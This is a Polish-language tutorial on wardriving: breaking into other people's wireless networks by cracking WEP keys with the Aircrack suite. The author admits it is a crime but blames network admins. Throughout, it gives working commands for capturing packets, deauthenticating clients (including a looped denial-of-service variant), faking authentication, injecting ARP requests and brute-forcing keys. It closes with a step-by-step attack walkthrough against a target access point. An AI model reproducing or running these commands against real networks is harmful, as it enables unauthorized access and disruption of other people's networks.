Wardriving - Czyli łamiemy zabezpieczenia WEP

Wardriving

Słowo to powstało z języka angielskiego i oznacza war- (Wireless Access Revolution) oraz driving (jazda samochodem). Czyli jest to wyszukiwanie miejsc gdzie są dostępne sieci bezprzewodowe, i włamywanie się do nich i często podłączanie się do internetu (jest to traktowane jako przestępstwo). Do Wardriwingu potrzebny jest laptop, choć można wykonywać to na komputerze stacionarnym gdy mamy w zasięgu jakąś sieć bezprzewodową, oczywiście musimy posiadać karte sieciową bezprzewodową (wi-fi) i w zasięu jakąś sieć. Podsumowując to wszystko domyślam się gdzie tu jest przestępstwo, przecież Wina jest zawsze po stronie admina
Ale takie już jest nasze prawo. Więcej informacji jak łamać zabezpieczenia sieci dowiecie się w kolejnych artykułach.

Zabezpieczenia -
Filtracja MAC
Filtracja MAC jest stosowana w wielu sieciach bezprzewodowych, działa na takiej zasadzie: Na AP są przypisane adresy fizyczne kart MAC, które są kątrolowane przez AP jeśli nie jesteśmy wpisani na liste adresów MAC to możemy się połączyć z siecią ale nie będziemy mieli naprzykład dostępu do internetu. To zabezpieczenie jest najłatwiej obejść.

WEP
Podstawowym zabezpieczeniem sieci bezprzewodowych przed nieautoryzowanym podsłuchem w standardzie 802.11 jest WEP(Wireless Equivalent Privacy). Długość klucza zależy od użytkownika i ma on następujące długości 40, 64, 128, 152, 256 bitów. Oznacza to że jeśli nie znamy klucza nie możemy podłączyć się do sieci ani podsłuchiwać przesyłanych pakietów. Niestety WEP ma swoją wade, posługuje się nie zmiennym kluczem, który jest łatwo złamać. Tak więc szyfrowanie WEP jest używane dotychczas w większości sieciach bezprzewodowych

WPA
(Wi-Fi Protected Access) W przeciwieństwie do WEP wykorzystuje zmienne w czasie kluczy szyfrujących, dzięki czemu jest już trudniej złamać takie zabezpieczenie. Są dwa sposoby korzystania z WPA, pierwszy sposób to połączenie z kluczem PSK (Pre-Shared Key) drugi natomiast połączeniu z serwerem autoryzacji naprzykład może to być RADIUS. Podobieństwo z WEP jest takie że też podajemy hasło dzięki temu zostaną wygenerowane klucze szyfrujące. Ale niestety dotychczas WPA ma małe zastosowanie ze wzgledu na kompatybilność urządzeń oraz ich cen, ale gdy zależy nam na bezpieczeństwie naszej sieci to warto zainwestować.

Łamanie zabezpieczeń

Aircrack jest zbiorem narzędzi, które przy umiejętnym wykorzystaniu dają nam możliwość złamania klucza WEP/WPA-PSK. Jest to program linuxowy, ale w sieci E-Mule znajduje się wersja przygotowana pod windowsa. Niestety jest ona trochę okrojona, ale o tym poĄniej. Wracając do tematu w skład pakietu Aircrack wchodzi:

1) airodump
2) aircrack
3) aireplay (wersja jedynie linuxowa)

Przedstawię Wam teraz po krótce te programy, poznamy ich funkcję, podstawowe komendy i zastosowanie. Następnie przejdziemy do zastosowania zdobytej wiedzy w praktyce. Zacznijmy od punktu pierwszego:

AIRODUMP
Jak juz wspomniałem jest to program, który przechwytuje z eteru pakiety wysyłane do i z Access Point'u (punkt dostępowy - AP - od tej pory używać będziemy tego skrótu). Airodump pracuje w sposób pasywny,a przez to wymaga wprowadzenia karty w tryb monitoringu. Jak to zrobić? Bardzo prosto - zarówno Auditor (po zalataniu) jak i Whax maja do tego dopowiedni skrypt. Jednak zanim go użyjemy musimy wiedzieć jaki jest interfesj naszej karty bezprzewodowej. W tym celu wpisujemy w terminalu :

#iwconfig


("#" - oczywiście nie wpisujemy, od tej pory bedzie to znak, ze mamy do czynienia z komandą, którą trzeba wpisać do terminalu)

Po wpisaniu komandy iwconfig otrzymujemy:

#ifconfig ath0 up
Czas na odpalenie skryptu wprowadzającego naszą kartę w tryb monitoringu. Składnia polecenia wygląda tak:

airmon.sh start/stop [interfejs]


Więc w przypadku mojej karty wpisuję:

#airmon.sh start ath0- w celu włączenia trybu monitoringu

#airmon.sh stop ath0 - w celu wyłączenia

Gdy wprowadziliśmy już kartę w tryb monitoringu możemy przejść do właściwego programu, czyli airodumpa. Składnia polecenia jest bardzo prosta:

airodump [interfejs] [nazwa_pliku] [kanał] [tylko_IVsy]


-interfejs - tak jak powyżej
-nazwa_pliku - nazwa pod jaka airodump bedzie zapisywal przechwycone pakiety
-kanał - podajemy numer kanału, z którego chcemy przechwytywać pakiety (1-13), wpisanie 0 bedzie oznaczać, że chcemy przechwytywać pakiety ze wszystkich kanałów
-tylko_IVsy - w przypadku łamania WEP po wpisaniu 1 airodump będzie zapisywał jedynie pakiety potrzebne do złamania klucza, co ograniczy znacznie rozmiary zapisywanych plików

Kilka wskazówek:

1)dobrze, żeby nazwa pliku była krótka i łatwa do zapamiętania
2)dla rozeznania dobrze jest najpierw uruchomić airodumpa z opcja 0 w , a następnie ograniczyś się jedynie do kanału, na którym jest sieć
3)nie wskazane jest włączanie Kismeta w trakcie używania airodumpa, zakłuca on prawidłową pracę airodumpa!

Kilka przykładów:

#airodump ath0 x 0
- przechwytujemy wszystkie pakiety ze wszystkich 13tu kanałów

#airodump ath0 x 5
- przechwytujemy wszystkie pakiety z 5-tego kanału

#airodump ath0 x 5 1
- przechwytujemy pakiety z 5-tego kanału, jednak airodump zapisuje jedynie te, które bedą mu potrzebne do złąmania klucza WEP - tzw. IV'sy (Initialization Vector)

Omówimy teraz wygląd okienka airodumpa. Ze względu na różne wersje aircarcka, z którymi przyjdzie Wam pracować wygląd programu bedzie się nieznacznie różnił. Nie mniej jednak podstawowe jego elementy bedą zachowane. Żeby nie wprowadzać zamieszania będe posługiwał się wersją 2.41. Okienko programu wygląda tak:

Cytat:

BSSID - adres MAC Access Point'u PWR - poziom sygnału odbierany przez naszą kartę Beacons - liczba przechwyconych informacujnych pakietów, które AP wysyła ze stałą częstotliwością w celu rozgłoszenia swojego istnienia #Data - liczba przechwyconych pakietów CH - numer kanału na którym nadaje AP MB - maksymalna prędkość transferu jaką obsługuje AP ENC - szyfrowanie (OPN/WEP/WPA, gdzie OPN oznacza nieszyfrowaną sieć otwartą) ESSID - nazwa własna sieci nadana przez jej administratora STATION - adres MAC klienta połączonego z daną siecią AIRCRACK Aircrack jest właściwym łamaczem szyfrowania WEP/WPA-PSK (poczytasz o nich więcej w kolejnym artykule na naszej stronie). Program ten wykorzystuje zarówno technikę bruteforce, jak i atak słownikowy - szczególnie przydatny w przypadku szyfrowania WPA. W przypadku klucza WEP wykorzystuje on lukę w szyfrowaniu i przy wykorzystaniu odpowiedniej liczby pakietów zawierających IVsy jest w stanie złamać klucz WEP w kilkanaście sekund- przeczytacie o tym w dalszej części tego artykułu, kiedy przejdziemy do praktycznego wykorzystania naszej wiedzy. Zacznijmy od omówienia najważniejszych opcji aircracka. Cytat: -a [x] - wybieramy typ zabezpieczenia (x=1 dla WEP, x=2 dla WPA) -e [essid] - określamy nazwę sieci, jeżeli nie jest ona rozsyłana przez AP, a ją znamy [opcjonalnie] -b [bssid] - określamy MAC AP - czyli nasz cel -q - cichy tryb, aircrack nie wyswietla procesu łamania aż do czasu złamania klucza albo niepowodzenia, zalecany szczególnie w przypadku starszych komputerów UWAGA: wszystkie poniższe opcje z wyjątkiem ostatniej dotyczą łamania klucza WEP, ta ostatnia WPA-PSK -c - aircrack szuka tylko znakow alfa-numerycznych -i [x] - indeks klucza (x=1 do 4), standardowo: wszystkie / ciekawe, że do tej pory nie spotkałem się z propozycją zmiany indeksu kucza jako zabezpieczenia, co więcej mało kto wie, że jest taka możliwość, dlatego propouje używać tej opcji jako: -i 1 -n [x] - dlugosc klucza WEP x= 64 / 128 / 152 / 256 moim zdaniem lepiej nie podawac tego parametru jesli nie mamy pewności jakiej dlugości jest klucz, standardowo jest ustawiony 128bitowy, jednak zdazają się klucze 64bitowe. Dlatego mozna początkowo próbować z opcją -n 64. Skróci to czas łamania, ale nie gwarantuje efektu -f [x] - fudge factor (margines bezpieczeństwa) - dla klucza 128bitowego standardowo ustawiony na x=2, dla klucza 64bitowego na x=5, zwiekszając margines wydłuży się czas łamania klucza, ale zwiększy się parwdopodobieństwo sukcesu -k [x] - aircrack wykorzystuje specjalne techniki opracowane przez hackera o polskobrzmiącym nicku KoreK, jest ich 17. Czasami jednak jedna z tych technik powoduje powstanie błędu i uniemożliwia w ten sposób złamanie klucza. Wtedy musimy po kolei wyłączyć każdy z tych 17tu ataków. Za każdym razem zwiększając o 1 parametr x, zaczynając od 1- x=1, x=2,..., x=17 -x /- zastosowanie tego parametru sprawi, że 2 ostatnie bajty klucza nie beda łamane metodą bruteforce -y - jest to eksperymentalny pojedynczy atak bruteforce, ktory powinien być stosowany tylko w przypadku, gdy standardowy atak nie jest w stanie złamać klucza przy ponad 1mln zebranych pakietów -0 / kolorowy aircrack - wygląda ładnie, ale jego wydajniść spada, nie zalecany na starszym sprzęcie -w [scieżka dostępu do slownika] - atak słownikowy 1)WEP (x - nazwa pliku, którą podałem w airodumpie, pamiętacie?) Atak bruteforce na klucz 128bitowy: #aircrack -a 1 -c -x -i 1 -0 x*.cap [lub x*.ivs] Atak bruteforce na klucz 64bitowy: #aircrack -a 1 -c -x -i 1 -0 -n 64 x*.cap [lub x*.ivs] 2)WPA-PSK (tu sprawa jest prosta, możliwy jedynie atak słownikowy) #aircrack -w /katalog_ze_slownikiem/slownik.txt - atak slownikowy Poznaliśmy już możliwości aircracka, zapraszam do poznania programu aireplay. AIREPLAY Aireplay jest narzędziem dzięki któremu czas łamania klucza WEP ulega znacznemu skróceniu. Wstrzykuje on odpowiednio spreparowane pakiety i wymusza na AP wysyłanie pakietów zawierających IVsy. Dzięki temu czas zbierania odpowiedniej liczby pakietów ulega znacznemu skróceniu. Ma on 5 opcji ataku, omówie jednak tylko 3, moim zdaniem najistotniejsze i najbardziej efektywne. 1) Atak 0 - deautentykacja (deauthentication) Atak ten wykorzystywany jest do: -odkrycia nierozgłaszanego ESSID'u -uzyskania ARP request (żądanie ARP) -ataku typu DoS (Denial of Service) PAMIĘTAJCIE: Skuteczny jest jedynie wtedy, gdy do AP podłączony jest przynajmniej jeden klient!!! Składnia tego ataku wygląda tak: #aireplay -0 [n] -a [MAC_AP] -c [MAC_KLIENTA] [interfejs_karty_WLAN] Atak ten powoduje zerwanie połączenia między klientem a AP i ponowne jego zalogowanie. Przyspiesza to uzyskanie żądania ARP i ukrytego ESSIDU. W tym celu wstawiamy za n wstawiamy liczbe 5-20, np: #aireplay -0 15 -a 3e:00:20:2f:21:22 -c 10:00:1e:3e:5h:55 ath0 Natomiast w celu wykonania ataku DoS zamiast n wstawiamy 0, co zapetla procedurę: #aireplay -0 0 -a 3e:00:20:2f:21:22 -c 10:00:1e:3e:5h:55 ath0 2) Atak 1 - slałszowana autentykacja (fake authentication) Atak ten jest bardzo użyteczny, gdy z AP nie jest połączony żaden klient. Tworzymy sfałszowanego klienta AP o określonym przez nas adresie MAC, który zostanie zapisany w tabeli asocjacyjnej Punktu Dostępowego. Następnie użyjemy tego adresu do ataku numer 3. Składnia polecenia wygląda tak: #aireplay -1 0 -e [ESSID=nazwa własna] -a [MAC_AP] -h [MAC_USTALONY_PRZEZ_NAS] [interfejs] np. #aireplay -1 0 -e zielonaszkolka -a 12:12:13:13:3e:3f -h 11:11:11:11:11:11 ath0 3) Atak 3 - ponowne wstrzykiwanie żądania ARP (ARP-request reinjection) Jest to najbardziej efektywny atak prowadzący do wygenerowania dużej liczby nowych IVsow. W połączeniu z atakiem 0wym lub 1szym pozwala niezwykle szybko złamać klucz WEP. Jego składnia wygląda tak: #aireplay -3 -b [MAC_AP] -h [MAC_KLIENTA/MAC_USTALONY_PRZEZ_NAS] [interfejs] np. #aireplay -3 -b 12:12:13:13:3e:3f -h 11:11:11:11:11:11 ath0 #aireplay -3 -b 12:12:13:13:3e:3f -h 11:11:11:11:11:11 -x 700 ath0 #aireplay -3 -b 12:12:13:13:3e:3f -h 11:11:11:11:11:11 -x 100 ath0 ŁAMANIE KLUCZA WEP Airodump, aircrack i aireplay doskonale ze sobą współpracują w czasie rzeczywistym. I nie trzeba czekać aż jeden skończy pracę, wręcz przeciwnie- dopiero łącząc działanie trzech wyżej wymienionych programów mamy możliwość odniesienia sukcesu. Czasu łamania klucza WEP, zależy od: a) ruchu w sieci b) użycia aireplaya z odpowiednią liczbą pakietów/s (opcja -x) c) dostosowania rate (1-54M) do odleglosci od ap'ka (ma to wplyw na % pakietow, ktore docieraja do AP) d) odpowiednich opcji a aircracku - wydatnie przyspieszają czas łamania, o tym już wiemy e) jakości i predkości połączenia z AP f) szczęścia - w końcu to atak bruteforce Bierzmy się do roboty: Podczas łamania klucza WEP możemy napotkać na 3 sytuacje. Pierwszą z nich jest sytuacja, gdy z AP połączony jest przynajmniej 1 klient SYTUACJA 1 - klienci połączeni z AP 1. Otwieramy pierwszy terminal i wpisujemy: #ifconfig ath0 up #airmon.sh start ath0 Karta działa teraz w trybie monitoringu. 2. Teraz zobaczymy co słychać w eterze: #airodump ath0 x 0 1 3. Na kanale 2 widzimy sieć prawdopodobnie zabezpieczoną kluczem WEP. Przyjrzyjmy się jej bliżej: #airodump ath0 x 2 1 4. Otwieramy drugi terminal: Zastosujemy teraz atak 3 (ARP-request reinjection) - w celu szybkiego nagromadzenia IVsow #aireplay -3 -b 00:30:4f:xx:xx:xx -h 00:30:4f:yy:yy:yy ath0 Po niedługiej chwili aireplay powinien przechwycić żądanie-ARP i rozpocząć proces wstrzykiwania. Jak już wspomniałem możemy ten proces przyspieszyć stosując atak 0 (deauthentication). W tym celu otwieamy trzeci terminal: #aireplay -0 15 -a 00:30:4f:xx:xx:xx -c 00:30:4f:yy:yy:yy ath0 Wracamy do poprzedniego terminalu i widzimy, że aireplay przechwycił żądanie-ARP i rozpoczął wstrzykiwanie pakietów 5. Sprawdzamy jak przebiega proces przechwytywania pakietów przez airodumpa w terminalu pierwszym Jeżeli airodump uzbierał ok 10000 IVsow, możemy uruchomić aircracka. Wcześniej nie ma to sensu. 6. Mamy 10000 IVs - otwieramy czwarty terminal: #aircrack -a 1 -c -x -i 1 -0 x*.ivs- atak bruteforce na klucz 128bitowy Rozpoczyna się proces łamania klucza WEP: Łamanie klucza zakończone

---